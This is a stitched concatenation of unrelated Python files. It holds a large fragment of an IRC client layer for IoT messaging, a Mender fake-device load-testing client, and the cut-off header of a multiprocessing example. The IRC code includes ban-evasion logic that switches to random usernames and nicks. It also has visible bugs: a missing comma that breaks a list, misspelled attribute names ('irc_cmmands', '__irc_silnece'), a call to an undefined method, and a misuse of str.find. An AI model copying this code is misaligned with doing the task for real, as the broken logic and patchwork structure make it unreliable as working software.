if my_item != "":
my_split = my_item.split('=')
my_param = ""
my_feature = my_split[0]
if len(my_split) == 2:
my_param = my_split[1]
for irc_pack in self.irc_features:
(irc_feature, featt_type, irc_function) = irc_pack
if irc_function != None:
if my_feature == irc_feature:
if featt_type == self.CONST.featt_EMPTY \
and my_param != "":
continue
if featt_type == self.CONST.featt_NUMBER \
and not my_param.isdigit():
continue
if featt_type in [ self.CONST.featt_STRING, \
self.CONST.featt_FLAGS ] and my_param == "":
continue
irc_args = (my_param, in_ret, in_init, in_wait)
(in_ret, in_init, in_wait) = irc_function(irc_args)
return (in_ret, in_init, in_wait)
def func_nick_in_use_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if self.irc_random_nick_(self.irc_nick_base) == 1:
return (-1, 0, in_wait)
return (in_ret, in_init, in_wait)
def func_restore_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
self.__irc_nick = self.irc_nick_old
return (in_ret, 3, in_wait)
def func_bad_ping_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
# This is not a fact, and not according to the RFC, but the
# last word in the comment may be a parameter for the PONG
my_split = in_string.split(' ')
self.irc_pong_(my_split[-1])
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_not_reg_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
#if self.irc_random_nick_(self.__irc_nick) == 1:
# return (-1, 0, in_wait)
return (in_ret, 1, self.CONST.irc_default_wait)
def func_registered_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, 3, self.CONST.irc_default_wait)
def func_banned_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if self.__join_retry > 1:
if self.__join_retry > self.__join_retry_max:
# Now perhaps we were banned by the username,
# here, we should know this for sure how, and
# maybe connect to another server or from a
# different IP address
self.irc_reconnect_()
return (-1, 0, in_wait)
if self.__nick_pause > 0:
self.__nick_pause -= 1
elif self.irc_random_nick_(self.__irc_nick) == 1:
return (-1, 0, in_wait)
return (in_ret, 3, self.CONST.irc_default_wait)
def func_on_kick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, 3, self.CONST.irc_default_wait)
def func_on_kill_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_quit_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
self.irc_track_delete_nick_(irc_nick)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_no_such_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
irc_nick = self.irc_extract_single_(in_string)
self.irc_track_delete_nick_(irc_nick)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
if irc_nick == self.irc_nick_base:
self.irc_check_and_restore_nick_()
my_split = in_string.split(':', 3)
if len(my_split) > 2:
new_nick = my_split[2]
if self.is_irc_nick_(new_nick):
new_mask = new_nick + irc_mask[len(irc_nick):]
# checking the new mask with new nick for belong to the
# registered user, and, if necessary, give him rights
my_vuid = self.irc_get_vuid_by_mask_(new_mask, self.irc_channel)
self.irc_umode_by_nick_mask_(new_nick, new_mask, my_vuid)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_fast_nick_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
my_seconds = 0
if self.CONST.irc_default_draft == "ircu":
# Calculating from code 438 comments, not by RFC 1459
my_split = in_string.split(' ')
if len(my_split) > 11:
if my_split[-3] == 'wait' and my_split[-1] == 'seconds.':
try:
my_seconds = int(my_split[-2])
except:
pass
if my_seconds > 0 \
and my_seconds < self.CONST.irc_default_nick_pause * 2:
self.__nick_pause = my_seconds # trys != seconds, but ...
else:
self.__nick_pause = self.CONST.irc_default_nick_pause
return (in_ret, 3, self.CONST.irc_default_wait)
#
# End of func_fast_nick_()
def func_chan_nicks_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_array = my_array[2].split(" ")
for my_nick in my_array:
if my_nick[0] == '@':
my_nick = my_nick[1:]
self.irc_track_add_nick_(my_nick, None, None, None)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_chan_nicks_()
def func_end_nicks_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(" ")
in_ret = self.irc_who_channel_(my_array[3])
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_who_user_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
# Here will be a check of self.__whox
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_info = my_array[2][2:]
my_array = my_array[1].split(" ")
my_nick = my_array[7]
my_user = my_array[4]
my_host = my_array[5]
my_mask = my_nick + "!" + my_user + "@" + my_host
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_who_user_()
def func_whois_user_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
try:
my_array = in_string.split(":")
if my_array[0] == "":
my_info = my_array[2]
my_array = my_array[1].split(" ")
my_nick = my_array[3]
my_user = my_array[4]
my_host = my_array[5]
my_mask = my_nick + "!" + my_user + "@" + my_host
my_vuid = self.irc_get_vuid_by_mask_(my_mask, self.irc_channel)
self.irc_track_update_nick_(my_nick, my_mask, my_vuid, my_info)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait - 1)
#
# End of func_whois_user_()
def func_on_join_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
my_vuid = self.irc_get_vuid_by_mask_(irc_mask, self.irc_channel)
self.irc_umode_by_nick_mask_(irc_nick, irc_mask, my_vuid)
self.irc_track_add_nick_(irc_nick, irc_mask, my_vuid, None)
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_part_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
self.irc_track_delete_nick_(irc_nick)
if irc_nick == self.irc_nick_base:
self.irc_check_and_restore_nick_()
return (in_ret, in_init, self.CONST.irc_default_wait)
def func_on_mode_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
(irc_nick, irc_mask) = self.irc_extract_nick_mask_(in_string)
try:
my_array = in_string.split(" ")
if len(my_array) < 5:
return (in_ret, in_init, in_wait)
if my_array[1] != self.CONST.cmd_MODE:
return (in_ret, in_init, in_wait)
my_channel = my_array[2]
if not self.is_irc_channel_(my_channel):
return (in_ret, in_init, in_wait)
my_mode_string = my_array[3]
if len(my_mode_string) < 2:
return (in_ret, in_init, in_wait)
for my_char in my_mode_string:
if my_char not in self.CONST.irc_all_modes_chars:
return (in_ret, in_init, in_wait)
my_change = self.CONST.irc_mode_add
my_index = 0
my_nick = False
my_unban = None
for my_char in my_mode_string:
if my_char in self.CONST.irc_change_modes:
my_change = my_char
elif my_char in self.CONST.irc_user_modes:
my_mask = my_array[my_index + 4]
self.to_log_( \
"mode change '{}','{}' for '{}' on '{}'".format( \
my_change, my_char, my_mask, my_channel))
if my_change == self.CONST.irc_mode_del \
and my_char == self.CONST.irc_umode_op:
my_vuid = self.irc_get_vuid_by_mask_(irc_mask, \
self.irc_channel)
self.irc_umode_by_nick_mask_(my_mask, irc_mask, \
my_vuid)
if my_change == self.CONST.irc_mode_add \
and my_char == self.CONST.irc_umode_ban:
my_mask_array = my_mask.split("!")
my_pseudo = self.__irc_nick + '!'
my_pseudo += my_mask_array[1]
if self.irc_check_mask_(my_pseudo, my_mask):
my_nick = True
for my_item in self.irc_nicks:
(n_nick, n_mask, n_vuid, n_info) = my_item
if n_vuid[0] == self.CONST.api_vuid_cfg:
if self.irc_check_mask_(n_mask, my_mask):
my_unban = n_vuid
break
if not my_unban:
for my_num in range(len(self.irc_users)):
u_mask = self.irc_cfg_get_user_mask_(my_num)
if isinstance(u_mask, str):
u_mask = u_mask.replace('*', '_')
if self.irc_check_mask_(u_mask, my_mask):
u_vuid = self.irc_cfg_get_vuid_(my_num)
if u_vuid != None:
my_unban = u_vuid
break
my_index += 1
elif my_char in self.CONST.irc_channel_modes:
self.to_log_( \
"mode change '{}','{}' for '{}'".format( \
my_change, my_char, my_channel))
elif my_char in self.CONST.irc_extra_modes:
my_extra = my_array[my_index + 4]
self.to_log_( \
"mode change '{}','{}' extra '{}' for '{}'".format( \
my_change, my_char, my_extra, my_channel))
my_index += 1
if my_unban != None:
my_user = self.irc_cfg_get_user_struct_by_vuid_(my_unban)
if my_user != None:
my_opts = self.irc_get_useropts_from_user_struct_(my_user)
if self.CONST.irc_unban in my_opts:
in_ret = self.irc_send_("{} {} {}{} {}\r\n".format( \
self.CONST.cmd_MODE, my_channel, \
self.CONST.irc_mode_del, \
self.CONST.irc_umode_ban, my_mask))
if my_nick:
self.irc_random_nick_(self.__irc_nick, True)
if my_nick or my_unban:
return (in_ret, in_init, 0)
except:
return (in_ret, in_init, in_wait)
return (in_ret, in_init, self.CONST.irc_default_wait)
#
# End of func_on_mode_()
def func_on_error_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
if in_string.find("Closing ") or in_string.find("imeout"):
return (-1, 0, in_wait)
return (in_ret, 1, self.CONST.irc_default_wait)
# SERVICE Hooks:
def func_on_srv_info_(self, in_args):
(in_string, in_ret, in_init, in_wait) = in_args
return (in_ret, in_init, in_wait)
def init_rfc1459_(self):
#
C = self.CONST
#
self.irc_codes = [
(C.ERR_NICKNAMEINUSE, "ERR_NICKNAMEINUSE", self.func_nick_in_use_),
(C.ERR_NOTREGISTERED, "ERR_NOTREGISTERED", self.func_not_reg_),
(C.ERR_BANNEDFROMCHAN, "ERR_BANNEDFROMCHAN", self.func_banned_),
(C.ERR_NICKCHANGETOOFAST,"ERR_NICKCHANGETOOFAST",self.func_fast_nick_),
(C.RPL_NAMREPLY, "RPL_NAMREPLY", self.func_chan_nicks_),
(C.RPL_ISUPPORT, "RPL_ISUPPORT", self.func_featurelist_),
(C.RPL_WHOISUSER, "RPL_WHOISUSER", self.func_whois_user_),
(C.RPL_ENDOFNAMES, "RPL_ENDOFNAMES", self.func_end_nicks_),
(C.RPL_WHOREPLY, "RPL_WHOREPLY", self.func_who_user_),
(C.ERR_NOSUCHNICK, "ERR_NOSUCHNICK", self.func_no_such_nick_),
(C.ERR_CHANNELISFULL, "ERR_CHANNELISFULL", self.func_banned_),
(C.ERR_BADCHANNELKEY, "ERR_BADCHANNELKEY", self.func_banned_),
(C.ERR_ERRONEUSNICKNAME, "ERR_ERRONEUSNICKNAME", self.func_nick_in_use_),
(C.ERR_NOSUCHCHANNEL, "ERR_NOSUCHCHANNEL", self.func_banned_),
(C.ERR_NICKCOLLISION, "ERR_NICKCOLLISION", self.func_nick_in_use_),
(C.ERR_ALREADYREGISTERED,"ERR_ALREADYREGISTERED",self.func_registered_),
(C.RPL_WELCOME, "RPL_WELCOME", None),
(C.RPL_CREATED, "RPL_CREATED", None),
(C.RPL_MYINFO, "RPL_MYINFO", None),
(C.RPL_LUSERCHANNELS, "RPL_LUSERCHANNELS", None),
(C.RPL_LUSERME, "RPL_LUSERME", None),
(C.ERR_NOSUCHSERVER, "ERR_NOSUCHSERVER", None),
(C.ERR_CANNOTSENDTOCHAN, "ERR_CANNOTSENDTOCHAN", None),
(C.ERR_TOOMANYCHANNELS, "ERR_TOOMANYCHANNELS", None),
(C.ERR_WASNOSUCHNICK, "ERR_WASNOSUCHNICK", None),
(C.ERR_TARGETTOOFAST, "ERR_TARGETTOOFAST", None),
(C.ERR_TOOMANYTARGETS, "ERR_TOOMANYTARGETS", None),
(C.ERR_NOORIGIN, "ERR_NOORIGIN", None),
(C.ERR_NORECIPIENT, "ERR_NORECIPIENT", None),
(C.ERR_NOTEXTTOSEND, "ERR_NOTEXTTOSEND", None),
(C.ERR_NOTOPLEVEL, "ERR_NOOPLEVEL", None),
(C.ERR_WILDTOPLEVEL, "ERR_WILDTOPLEVEL", None),
(C.ERR_UNKNOWNCOMMAND, "ERR_UNKNOWNCOMMAND", None),
(C.ERR_NOMOTD, "ERR_NOMOTD", None),
(C.ERR_NOADMININFO, "ERR_NOADMININFO", None),
(C.ERR_FILEERROR, "ERR_FILEERROR", None),
(C.ERR_NONICKNAMEGIVEN, "ERR_NONICKNAMEGIVEN", None),
(C.ERR_USERNOTINCHANNEL, "ERR_USERNOTINCHANNEL", None),
(C.ERR_NOTONCHANNEL, "ERR_NOTONCHANNEL", None),
(C.ERR_NOLOGIN, "ERR_NOLOGIN", None),
(C.ERR_SUMMONDISABLED, "ERR_SUMMONDISABLED", None),
(C.ERR_USERSDISABLED, "ERR_USERSDISABLED", None),
(C.ERR_NEEDMOREPARAMS, "ERR_NEEDMOREPARAMS", None),
(C.ERR_USERSDONTMATCH, "ERR_USERSDONTMATCH", None),
(C.ERR_PASSWDMISMATCH, "ERR_PASSWDMISMATCH", None),
(C.ERR_YOUREBANNEDCREEP, "ERR_YOUREBANNEDCREEP", None),
(C.ERR_YOUWILLBEBANNED, "ERR_YOUWILLBEBANNED", None),
(C.ERR_KEYSET, "ERR_KEYSET", None),
(C.ERR_UNKNOWNMODE, "ERR_UNKNOWNMODE", None),
(C.ERR_INVITEONLYCHAN, "ERR_INVITEONLYCHAN", None),
(C.ERR_BADCHANNELMASK, "ERR_BADCHANNELMASK", None),
(C.ERR_BANLISTFULL, "ERR_BANLISTFULL", None),
(C.ERR_NOPRIVILEGES, "ERR_NOPRIVILEGES", None),
(C.ERR_CANTKILLSERVER, "ERR_CANTKILLSERVER", None),
(C.ERR_UNIQOPPRIVSNEEDED,"ERR_UNIQOPPRIVSNEEDED",None),
(C.ERR_NOOPERHOST, "ERR_NOOPERHOST", None),
(C.ERR_NOSERVICEHOST, "ERR_NOSERVICEHOST", None),
(C.ERR_UMODEUNKNOWNFLAG, "ERR_UMODEUNKNOWNFLAG", None) ]
if self.CONST.irc_default_draft == "PyIRCIoT":
self.irc_codes.extend( [
(C.RPL_JSON, "RPL_JSON", None) ] )
elif self.CONST.irc_default_draft == "ircu":
self.irc_codes.extend( [
(C.ERR_BADPING, "ERR_BADPING", self.func_bad_ping_),
(C.ERR_BANNICKCHANGE, "ERR_BANNICKCHANGE", self.func_restore_nick_),
(C.RPL_USERIP, "RPL_USERIP", None),
(C.ERR_INVALIDUSERNAME,"ERR_INVALIDUSERNAME", None) ] )
elif self.CONST.irc_default_draft == "Unreal":
self.irc_codes.extend( [
(C.ERR_NONICKCHANGE, "ERR_NONICKCHANGE", self.func_restore_nick_),
(C.RPL_WHOISBOT, "RPL_WHOISBOT", None),
(C.RPL_USERIP, "RPL_USERIP", None),
(C.RPL_REDIR, "RPL_REDIR", None)
(C.ERR_NOSUCHSERVICE, "ERR_NOSUCHSERVICE", None),
(C.ERR_NOINVITE, "ERR_NOINVITE", None),
(C.RPL_COMMANDSYNTAX, "RPL_COMMANDSYNTAX", None),
(C.RPL_STARTLS, "RPL_STARTLS", None),
(C.RPL_DCCSTATUS, "RPL_DCCSTATUS", None),
(C.RPL_TEXT, "RPL_TEXT", None) ] )
elif self.CONST.irc_default_draft == "Bahamut":
self.irc_codes.extend( [
(C.RPL_USIGNSSL, "RPL_USIGNSSL", None),
(C.ERR_NEEDREGGEDNICK, "ERR_NEEDREGGEDNICK", None),
(C.RPL_STATSCLONE, "RPL_STATSCLONE", None),
(C.RPL_TEXT, "RPL_TEXT", None) ] )
elif self.CONST.irc_default_draft == "Insp":
self.irc_codes.extend( [
(C.RPL_AUTOOPLIST, "RPL_AUTOOPLIST", None),
(C.RPL_ENDOFAUTOOPLIST,"RPL_ENDOFAUTOOPLIST", None),
(C.ERR_WORDFILTERED, "ERR_WORDFILTERED", None) ] )
elif self.CONST.irc_default_draft == "IRCNet":
self.irc_codes.extend( [
(C.ERR_NOCHANMODES, "ERR_NOCHANMODES", None),
(C.ERR_RESTRICTED, "ERR_RESTRICTED", None) ] )
else: # Unknown extending
pass
#
if self.__irc_layer_mode == self.CONST.irc_mode_CLIENT:
self.irc_commands = [
(C.cmd_INVITE, None),
(C.cmd_JOIN, self.func_on_join_),
(C.cmd_KICK, self.func_on_kick_),
(C.cmd_KILL, self.func_on_kill_),
(C.cmd_MODE, self.func_on_mode_),
(C.cmd_NICK, self.func_on_nick_),
(C.cmd_NOTICE, None),
(C.cmd_PART, self.func_on_part_),
(C.cmd_PONG, None),
(C.cmd_PRIVMSG, None),
(C.cmd_QUIT, self.func_on_quit_),
(C.cmd_ERROR, self.func_on_error_) ]
#
elif self.__irc_layer_mode == self.CONST.irc_mode_SERVER: # RFC 2813
self.irc_cmmands = [
(C.cmd_PASS, None), (C.cmd_SERVER, None),
(C.cmd_NICK, None), (C.cmd_QUIT, None),
(C.cmd_SQUIT, None), (C.cmd_JOIN, None),
(C.cmd_NJOIN, None), (C.cmd_MODE, None),
(C.cmd_LINKS, None), (C.cmd_KILL, None),
(C.cmd_NAMES, None), (C.cmd_INVITE, None),
(C.cmd_STATS, None), (C.cmd_CONNECT, None),
(C.cmd_TRACE, None), (C.cmd_ADMIN, None),
(C.cmd_WHO, None), (C.cmd_INFO, self.func_on_srv_info_),
(C.cmd_WHOIS, None), (C.cmd_WHOWAS, None),
(C.cmd_AWAY, None), (C.cmd_RESTART, None),
(C.cmd_SUMMON, None), (C.cmd_USERS, None),
(C.cmd_WALLOPS, None), (C.cmd_USERHOST, None),
(C.cmd_TOPIC, None), (C.cmd_KICK, None),
(C.cmd_PONG, None), (C.cmd_PART, None),
(C.cmd_ERROR, None), (C.cmd_PRIVMSG, None),
(C.cmd_PUBMSG, None), (C.cmd_PUBNOTICE, None),
(C.cmd_NOTICE, None), (C.cmd_PRIVNOTICE, None),
(C.cmd_ISON, None), (C.cmd_REHASH, None) ]
#
self.irc_features = [
(C.feature_CASEMAPPING, C.featt_STRING, None),
(C.feature_CHANMODES, C.featt_FLAGS, None),
(C.feature_CHANTYPES, C.featt_FLAGS, None),
(C.feature_NICKLEN, C.featt_NUMBER, self.func_feature_nicklen_),
(C.feature_PREFIX, C.featt_FLAGS, None) ]
if self.CONST.irc_default_draft == "ircu":
self.irc_features.extend( [
(C.feature_AWAYLEN, C.featt_NUMBER, None),
(C.feature_CHANNELLEN, C.featt_NUMBER, None),
(C.feature_CNOTICE, C.featt_EMPTY, None),
(C.feature_CPRIVMSG, C.featt_EMPTY, None),
(C.feature_MAXCHANLEN, C.featt_NUMBER, None),
(C.feature_KICKLEN, C.featt_NUMBER, None),
(C.feature_MODES, C.featt_NUMBER, None),
(C.feature_MAXCHANS, C.featt_NUMBER, None),
(C.feature_MAXBNANS, C.featt_NUMBER, None),
(C.feature_MAXNICKLEN, C.featt_NUMBER, self.func_feature_nicklen_),
(C.feature_NETWORK, C.featt_STRING, self.func_feature_network_),
(C.feature_SILENCE, C.featt_NUMBER, None),
(C.feature_STATUSMSG, C.featt_FLAGS, None),
(C.feature_TOPICLEN, C.featt_NUMBER, self.func_feature_topiclen_),
(C.feature_USERIP, C.featt_EMPTY, None),
(C.feature_WALLCHOPS, C.featt_EMPTY, self.func_feature_wallchops_),
(C.feature_WALLVOICES, C.featt_EMPTY, None),
(C.feature_WHOX, C.featt_EMPTY, self.func_feature_whox_) ] )
#
# End of init_rfc1459_()
def irc_output_all_(self, in_messages_packs, in_wait = None):
if not isinstance(in_messages_packs, list):
return
if not isinstance(in_wait, int) and \
not isinstance(in_wait, float):
in_wait = self.CONST.irc_default_wait
for my_pack in in_messages_packs:
(my_messages, my_vuid) = my_pack
if isinstance(my_messages, str):
my_messages = [ my_messages ]
if isinstance(my_messages, list):
for my_message in my_messages:
self.irc_add_to_queue_( \
self.CONST.irc_queue_output, \
my_message, in_wait, my_vuid)
#
# End of irc_output_all_()
# incomplete
def irc_process_server_(self):
#
self.init_rfc1459_()
#
try:
pass
except:
pass
self.irc_run = False
#
# End of irc_process_server_()
def irc_process_client_(self):
#
self.init_rfc1459_()
#
irc_init = 0
irc_wait = self.CONST.irc_first_wait
irc_input_buffer = ""
irc_ret = 0
irc_vuid = "{:s}0".format(self.CONST.api_vuid_cfg)
self.__delta_time = 0
# app.run(host='0.0.0.0', port=50000, debug=True)
# must be FIXed for Unprivileged user
self.irc = self.irc_socket_(self.irc_server)
while (self.irc_run):
try:
if not self.irc:
if self.__join_retry == 0:
sleep(self.CONST.irc_first_wait)
self.irc = self.irc_socket_(self.irc_server)
irc_init = 0
if irc_init < 6:
irc_init += 1
if irc_init == 1:
# self.to_log_(self.errors[self.CONST.err_CONNTO] \
# + "'{}:{}'".format(self.irc_server_ip, self.irc_port))
self.__irc_silnece = 0
try:
self.irc_connect_(self.irc_server_ip, self.irc_port)
except socket.error:
self.irc_disconnect_()
self.irc = self.irc_socket_(self.irc_server)
irc_init = 0
elif irc_init == 2:
if self.__irc_password:
self.irc_send_(self.CONST.cmd_PASS \
+ " " + self.__irc_password)
if self.__join_retry > self.__join_retry_max:
self.irc_user = self.irc_random_user_()
# Random username can override ban, but can
# destroy own IRC mask, it must be restored
else:
self.irc_user = self.irc_tolower_(self.__irc_nick)
if self.irc_send_(self.CONST.cmd_USER \
+ " " + self.irc_user \
+ " " + self.irc_host + " 1 :" \
+ self.irc_info) == -1:
irc_init = 0
elif irc_init == 3:
self.__join_retry = 0
if self.irc_send_(self.CONST.cmd_NICK \
+ " " + self.__irc_nick) == -1:
irc_init = 0
elif irc_init == 4:
if not self.is_irc_channel_(self.irc_channel): continue
irc_wait = self.CONST.irc_default_wait
self.__join_retry += 1
if self.irc_send_(self.CONST.cmd_JOIN \
+ " " + self.irc_channel + str(" " \
+ self.irc_chankey if self.irc_chankey else "")) == -1:
irc_init = 0
elif irc_init == 5:
if not self.is_irc_channel_(self.irc_channel): continue
irc_wait = self.CONST.irc_default_wait
self.__join_retry += 1
if self.irc_send_(self.CONST.cmd_JOIN \
+ " {}{}\r".format(self.irc_channel, str(" " \
+ self.irc_chankey if self.irc_chankey else ""))) == -1:
irc_init = 0
elif irc_init == 6:
self.ident_run = False
if irc_init > 0:
(irc_ret, irc_input_buffer, self.__delta_time) \
= self.irc_recv_(irc_wait)
else:
irc_ret = -1
irc_wait = self.CONST.irc_default_wait
if irc_init > 3 and self.__irc_silence >= self.irc_silence_max \
and self.is_irc_channel_(self.irc_channel):
if self.__irc_silence == self.irc_silence_max:
# To provoke TCP interaction, we take some action
if self.irc_who_channel_(self.irc_channel) == -1:
irc_init = 0
else:
self.irc_check_and_restore_nick_()
elif self.__irc_silence > self.irc_silence_max:
irc_init = 0
if irc_init == 0:
irc_ret = -1
self.__irc_silence += 1
if self.__delta_time > 0:
irc_wait = self.__delta_time
else:
if irc_init == 6:
self.irc_track_clarify_nicks_()
if irc_ret == -1:
self.irc_reconnect_()
irc_init = 0
continue
for irc_input_split in re.split(r'[\r\n]', irc_input_buffer):
if irc_input_split == "":
irc_input_buff = ""
continue
self.__irc_silence = 0
if irc_input_split[:5] == self.CONST.cmd_PING + " ":
self.__delta_ping \
= self.td2ms_(self.time_now - self.__time_ping)
self.__time_ping = self.time_now
if self.irc_pong_(irc_input_split) == -1:
self.irc_reconnect_()
irc_init = 0
break
else:
self.irc_track_clarify_nicks_()
try:
irc_input_cmd = irc_input_split.split(' ')[1]
except:
irc_input_cmd = ""
if irc_input_split[0] == ':':
for irc_cod_pack in self.irc_codes:
(irc_code, code_name, irc_function) = irc_cod_pack
if irc_function != None:
if irc_input_cmd == irc_code:
irc_args = (irc_input_split, \
irc_ret, irc_init, irc_wait)
(irc_ret, irc_init, irc_wait) = irc_function(irc_args)
for irc_cmd_pack in self.irc_commands:
(irc_cmd, irc_function) = irc_cmd_pack
if irc_function != None:
if irc_input_cmd == irc_cmd:
irc_args = (irc_input_split, irc_ret, irc_init, irc_wait)
(irc_ret, irc_init, irc_wait) = irc_function(irc_args)
if irc_input_cmd == self.CONST.cmd_PRIVMSG \
or irc_input_split == "":
irc_nick = ""
irc_mask = "!@"
irc_vuid = None
irc_message = None
if irc_input_split != "":
(irc_nick, irc_mask) \
= self.irc_extract_nick_mask_(irc_input_split)
self.irc_track_fast_nick_(irc_nick, irc_mask)
self.time_now = datetime.datetime.now()
irc_message = self.irc_extract_message_(irc_input_split)
if irc_message == None and irc_input_buffer == "":
self.time_now = datetime.datetime.now()
irc_message = ""
if irc_message != None:
irc_vuid = self.irc_get_vuid_by_mask_(irc_mask, self.irc_channel)
if irc_vuid != None and irc_init > 3 \
and self.is_json_(irc_message):
if self.irc_talk_with_strangers:
self.irc_track_update_anons_by_vuid_(irc_vuid, \
irc_mask, self.irc_channel, \
None, None, None, None, None, None, None)
self.irc_add_to_queue_(self.CONST.irc_queue_input, \
irc_message, self.CONST.irc_default_wait, irc_vuid)
irc_input_split = ""
irc_input_buff = ""
if irc_init > 5:
(irc_message, irc_wait, irc_vuid) \
= self.irc_check_queue_(self.CONST.irc_queue_output)
irc_message = str(irc_message)
if irc_message != "":
my_private = False
if irc_vuid != self.CONST.api_vuid_all:
my_nick = self.irc_track_get_nick_by_vuid_(irc_vuid)
if self.is_irc_nick_(my_nick):
my_private = True
if my_private:
self.irc_send_(self.CONST.cmd_PRIVMSG + " " \
+ my_nick + " :" + irc_message)
else:
self.irc_send_(self.CONST.cmd_PRIVMSG + " " \
+ self.irc_channel + " :" + irc_message)
irc_message = ""
if self.td2ms_(self.time_now - self.__time_ping) \
> self.__delta_ping * 2 and self.__delta_ping > 0:
if self.irc_who_channel_(self.irc_channel) == -1:
self.irc_reconnect_()
irc_init = 0
else:
self.irc_check_and_restore_nick_()
self.__delta_ping = 0
except socket.error:
self.irc_disconnect()
self.irc = None
#
# End of irc_process_client_()
|
client.py
|
# The MIT License (MIT)
#
# Copyright (c) 2016 Gregorio Di Stefano
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import time
import threading
import random
import tempfile
import copy
from mender.cli import device
from mender.client import ClientNotAuthorizedError
def add_args(sub):
sub.set_defaults(clientcommand='')
sub.add_argument('-n', '--number', help="Number of clients", type=int, required=True)
sub.add_argument('-i', '--inventory', help="Inventory items", action='append', default=["device_type:fake-device", "image_type:fake-image"])
sub.add_argument('--inventory-update-freq', type=int, default=60)
sub.add_argument('-w', '--wait', help="Maximum wait before changing update steps", type=int, default=30)
sub.add_argument('-f', '--fail', help="Fail update with specific messsage", type=str, default="")
sub.add_argument('-c', '--updates', help="Number of updates to perform before exiting", type=int, default=1)
def do_main(opts):
threads = []
client_options = []
for _ in range(opts.number):
new_opts = copy.deepcopy(opts)
new_opts.store = True
new_opts.verify = False
new_opts.attrs_set = opts.inventory
new_opts.mac_address = ":".join(["%02x" % random.randint(0x00, 0xFF) for i in range(6)])
new_opts.device_key = tempfile.NamedTemporaryFile().name
new_opts.tenant_token = tempfile.NamedTemporaryFile().name
new_opts.device_token = tempfile.NamedTemporaryFile().name
threads.append(threading.Thread(target=run_client, args=(new_opts,)))
for t in threads:
t.start()
class InventoryReporter:
def __init__(self, opts):
self.thread = threading.Thread(target=self.send_inventory_data)
self.stop_event = threading.Event()
self.opts = opts
def start(self):
self.thread.start()
def stop(self):
self.stop_event.set()
self.thread.join()
def send_inventory_data(self):
while not self.stop_event.wait(self.opts.inventory_update_freq):
logging.info('inventory report')
device.do_inventory(self.opts)
def run_client(opts):
logging.info("starting client with MAC: %s", opts.mac_address)
need_auth = True
update_cnt = 0
while True:
if need_auth:
block_until_authorized(opts)
need_auth = False
inv = InventoryReporter(opts)
inv.start()
while True:
try:
block_until_update(opts)
update_cnt += 1
if opts.updates and update_cnt >= opts.updates:
break
except ClientNotAuthorizedError:
logging.info('client authorization expired')
need_auth = True
break
logging.info('waiting for inventory reporter')
inv.stop()
def block_until_authorized(opts):
logging.info("performing bootstrap")
device.do_key(opts)
while True:
if device.do_authorize(opts):
logging.info("successfully bootstrapped client")
return
else:
logging.info("device not authorized yet..")
time.sleep(5)
def block_until_update(opts):
return device.do_fake_update(opts)
|
subclassing_and_waiting.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
